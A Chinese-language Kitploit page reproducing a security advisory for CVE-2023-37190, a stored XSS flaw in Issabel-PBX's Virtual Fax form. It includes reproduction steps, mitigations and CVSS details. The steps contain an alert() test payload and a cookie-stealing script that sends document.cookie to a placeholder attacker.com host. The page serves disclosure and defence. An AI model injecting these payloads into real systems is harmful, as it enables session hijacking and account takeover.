Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-37190 — Issabel-PBX 4.0.0-6 版本中存在一个存储型跨站脚本(XSS)漏洞。该应用程序未能正确清理和编码用户提供的输入,便将其存储至数据库,并随后在 Web 界面中渲染显示。 | Kitploit
工具/GitHubGitHub/sahiloj/cve-2023-37190
漏洞分析漏洞利用Web应用程序漏洞利用Web安全论文与研究学习与教育
GitHubsahiloj/cve-2023-37190

CVE-2023-37190

Issabel-PBX 4.0.0-6 版本中存在一个存储型跨站脚本(XSS)漏洞。该应用程序未能正确清理和编码用户提供的输入,便将其存储至数据库,并随后在 Web 界面中渲染显示。

查看仓库
1126个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-37190 — Issabel-PBX 4.0.0-6:存储型跨站脚本攻击(XSS)

CVE Severity Type Affected Version


📋 概述

字段详情
CVE IDCVE-2023-37190
漏洞类型存储型跨站脚本攻击(XSS)
受影响产品Issabel-PBX
受影响版本4.0.0-6
严重性中危(CVSS v3.1 评分:5.4)
发现者Sahil Ojha
披露日期2023年7月7日
供应商Issabel
源代码IssabelFoundation/issabelPBX
测试环境Windows

📝 描述

Issabel-PBX 4.0.0-6 版本存在一个**存储型跨站脚本攻击(XSS)**漏洞。应用程序在将用户提供的输入存储到数据库并随后在Web界面中呈现之前,未能正确进行清理和编码。

该漏洞存在于虚拟传真(Virtual Fax)模块,具体位于“新建虚拟传真”创建表单中。两个输入参数——虚拟传真名称和来电显示名称——未经过充分的输入验证或输出编码。这使得拥有低权限的已认证攻击者能够在应用程序中注入并永久存储恶意JavaScript载荷。

一旦存储,恶意脚本会在任何访问受影响页面的用户(包括管理员)的浏览器中自动执行,无需攻击者进行任何额外的交互。


⚠️ 影响

成功利用此漏洞的攻击者可以:

  • 窃取会话Cookie并劫持已认证用户会话,包括管理员帐户。
  • 代表受害者执行操作,例如更改配置、添加用户或修改系统设置。
  • 将用户重定向至攻击者控制的钓鱼或恶意软件分发页面。
  • 篡改应用程序界面,影响用户体验和信任。
  • 向所有访问受影响页面的用户提供恶意软件或浏览器漏洞利用。
  • 执行键盘记录或捕获页面上输入的敏感信息。

由于载荷是存储型(持久性),它将影响每个访问此漏洞页面的用户,直到被移除——这使得其比反射型XSS更为严重。


🔢 CVSS v3.1 评分


🔍 漏洞详情

  • 漏洞类型: 存储型跨站脚本攻击(CWE-79)
  • 受影响组件: 虚拟传真模块 → 新建虚拟传真表单
  • 脆弱参数:
    • 虚拟传真名称
    • 来电显示名称
  • 需要认证: 是(低权限已认证用户)
  • 根本原因: 在存储到数据库并渲染到Web UI之前,受影响的参数缺少输入清理和输出编码。

🛠️ 复现步骤

前提条件

  • 运行中的 Issabel-PBX 4.0.0-6 实例。
  • 拥有访问传真模块权限的有效凭据(标准用户或管理员)。

复现步骤

步骤 1: 使用有效凭据登录 Issabel-PBX Web 应用程序。

步骤 2: 导航至 传真 → 虚拟传真 → 新建虚拟传真。

将以下 XSS 载荷注入虚拟传真名称和/或来电显示名称字段:

root@kitploit:~
<script>alert('XSS-CVE-2023-37190')</script>

为了演示会话Cookie窃取的更有效的概念验证(注意:在实际攻击中,使用HTTPS来避免传输中暴露窃取的Cookie):

root@kitploit:~
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

填写了注入载荷的表单应类似于以下截图:

步骤 2 - 将 XSS 载荷注入虚拟传真名称和来电显示名称字段

步骤 3: 点击保存按钮提交表单。载荷现已持久存储在应用程序数据库中。

步骤 4: 导航至虚拟传真列表页面(或让其他用户(如管理员)访问该页面)。存储的脚本将在访问者的浏览器中自动执行,如下所示:

步骤 4 - 存储型 XSS 载荷在浏览器中执行


🩹 缓解与修复

Issabel-PBX 用户和管理员强烈建议采取以下措施:

  1. 输入验证: 对所有用户提供的输入执行严格的服务端验证。拒绝或清理包含HTML特殊字符(<、>、"、'、&)的输入。
  2. 输出编码: 在Web界面中呈现用户提供的数据时,应用上下文相关的输出编码(HTML实体编码),以防止脚本执行。
  3. 内容安全策略(CSP): 实施严格的 Content-Security-Policy HTTP 头,限制脚本执行的来源,从而减少XSS漏洞的影响。
  4. 升级 / 打补丁: 关注官方Issabel仓库并及时应用供应商发布的安全补丁。
  5. 最小权限原则: 限制对虚拟传真等敏感模块的访问权限,仅授予需要这些模块的用户,从而缩小攻击面。

📚 参考

  • NVD - CVE-2023-37190
  • MITRE CVE条目
  • Issabel官方网站
  • GitHub上的IssabelFoundation/issabelPBX
  • CWE-79: 网页生成过程中输入的不当中和('跨站脚本')
  • OWASP: 跨站脚本攻击(XSS)

👤 作者

Sahil Ojha
安全研究员
GitHub: @sahiloj


免责声明: 本仓库仅供教育和负责任披露目的。此处提供的信息不应被用于在未获得系统所有者明确书面许可的情况下攻击系统。作者对任何滥用此信息的行为不承担责任。

下载工具
指标值
基础分数5.4(中危)
攻击向量网络
攻击复杂度低
所需权限低
用户交互需要
影响范围已改变
机密性低
完整性低
可用性无